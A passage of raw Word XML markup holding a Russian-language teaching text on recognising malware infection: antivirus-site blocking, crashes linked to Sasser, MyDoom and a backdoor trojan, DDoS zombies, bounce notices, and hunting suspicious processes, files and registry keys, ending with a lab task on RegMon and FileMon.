        <w:t>При этом вредоносные программы не блокируют доступ в Интернет ц</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ликом – это было бы слишком заметно, а только доступ к сайтам и серверам обновлений наиболее известных компаний – производителей антивирусов. В среднем, пользователи не часто заходят на сайты антивирусных компаний, а сообщения антивируса о невозможности обновиться могут списывать на пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>блемы у провайдера или на самих серверах обновления. Таким образом, вирус может длительное время оставаться незамеченным.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сбои в операционной системе или в работе программ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Очень часто причиной сбоев в работе программ пользователи считают присутствие на компьютере вирусов. И хотя большинство подобных случаев на поверку оказывается ложной тревогой, вирусы действительно иногда могут быть причиной сбоев.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Кроме уже рассмотренного примера с червем «Sasser», можно еще уп</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>мянуть червь «MyDoom», вызывавший похожее сообщение об ошибке, но не в службе LSASS, а в службе DCOM/RPC.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Распространялся по электронной почте и через файлообменную сеть «Kazaa». Файл-носитель червя имеет размер около 28 килобайт и содержит те</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>стовую строку «sync-1.01; andy; I’m just doing my job, nothing personal, sorry».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>При заражении компьютера «MyDoom» модифицирует операционную с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>стему, блокируя доступ к сайтам многих антивирусных компаний, новостным лентам и различным разделам сайта компании Microsoft. В период с 1 по 12 февраля «MyDoom.A» проводил DDoS-атаку на сайт Microsoft, а «MyDoom.B» – на сайт SCO Group.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Схематически DDoS-атака выглядит примерно так: на выбранный в кач</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>стве жертвы сервер обрушивается огромное количество ложных запросов со множества компьютеров с разных концов света. В результате сервер тратит все свои ресурсы на обслуживание этих запросов и становится практически нед</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ступным для обычных пользователей. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Циничность ситуации заключается в том, что пользователи компьютеров, с которых направляются ложные запросы, могут даже не подозревать о том, что их машина используется хакерами. Программы, установленные злоумышле</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>никами на этих компьютерах, принято называть «зомби». Известно множество путей «зомбирования» компьютеров – от проникновения в незащищенные сети, до использования программ-троянцев. Пожалуй, этот подготовительный этап является для злоумышленника наиболее трудоемким.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Но вернемся к основному материалу статьи, другой пример косвенных проявлений, троянская программа Backdoor.NTHack, результатом присутствия которой на компьютере может быть сообщение об ошибке, возникающее при загрузке компьютера:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>STOP 0x0000001e KMODE_EXCEPTION_NOT_HANDLED in win32k.sys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Или</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> STOP 0xC000021A {Fatal System Error}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Windows Logon Process terminated unexpectedly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Более детальную информацию о подобных критических ошибках ОС Windows, Вы сможете получить, прочитав статью «Синий экран смерти».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Почтовые уведомления</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Если компьютер заражен и рассылает инфицированные почтовые соо</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>б</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>щения, они могут быть обнаружены на одном из серверов в Интернете и ант</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вирус на сервере может отправить уведомление отправителю зараженного с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>общения. Следовательно, косвенным признаком присутствия вируса может быть получение почтового сообщения о том, что с почтового адреса пользов</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>теля компьютера был отправлен вирус.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Впрочем, в последнее время многие вирусы подменяют адрес отправит</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ля и получение описанного уведомления не обязательно означает, что компь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ю</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тер заражен. Из-за того, что формальный адрес отправителя, указанный в по</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ч</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>товом сообщении, может не иметь никакого отношения к зараженному комп</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ютеру, антивирусные программы часто вообще не отсылают уведомлений о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>правителям зараженных сообщений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Скрытые проявления</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В отсутствие явных или косвенных проявлений о присутствии вируса можно судить, например, по необычной сетевой активности, когда ни одно с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тевое приложение не запущено, а значок сетевого соединения сигнализирует об обмене данными. Другими признаками могут служить незнакомые процессы в памяти или файлы на диске.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Однако в настоящее время на компьютерах обычно установлено так мн</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>го различных программ, что большинство файлов и процессов неизвестны обычному пользователю. В то же время поиск скрытых проявлений это уже фактически поиск тех самых подозрительных файлов, которые нужно отпр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вить на анализ в антивирусную компанию.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Где искать «подозрительные» файлы?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Как видно, ни косвенные, ни даже явные проявления не могут служить основанием для уверенности в том, что компьютер заражен. Всегда существует вероятность, что наблюдаемый эффект не является результатом действий вир</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>са, а вызван обычными ошибками в используемых программах или же вред</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>носными скриптами, которые не оставили никаких файлов на компьютере.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для того чтобы подозрения переросли в уверенность нужно произвести дополнительный поиск скрытых проявлений вредоносных программ, имея к</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нечной целью обнаружение файлов вредоносной программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Скрытые проявления включают в себя: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">– наличие в памяти подозрительных процессов; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">– наличие на компьютере подозрительных файлов; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">– наличие подозрительных ключей в системном реестре Windows; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– подозрительная сетевая активность.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ключевым признаком во всех случаях является атрибут «подозрител</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ный». Что это означает? Это означает, что пользователю неизвестно назначение данного процесса, файла или ключа, и более того, информации о подозрител</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ном объекте нет ни в документации к операционной системе, ни в открытых источниках сети Интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Но прежде чем судить о подозрительности файлов и процессов, нужно сначала их выделить из общего </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>числа и на этом имеет смысл остановиться б</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>лее подробно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Подозрительные процессы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Процесс – это фактически запущенный исполняемый файл. Часть проце</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сов относится к операционной системе, часть к запущенным программам пол</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>зователя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Чтобы получить список процессов, нужно вызвать «Диспетчер задач Windows» – стандартное средство ОС для управления процессами. В операц</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>онных системах Windows NT/2000/XP/2003 для вызова диспетчера задач нужно нажать комбинацию клавиш &lt;Ctrl+Shift+Esc&gt; или вызвать контекстное меню в системной панели «ПУСК» и выбрать пункт Диспетчер задач.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:left="720"/>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left="720"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Изучить описание, назначение и возможности программ RegMon и FileMon.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
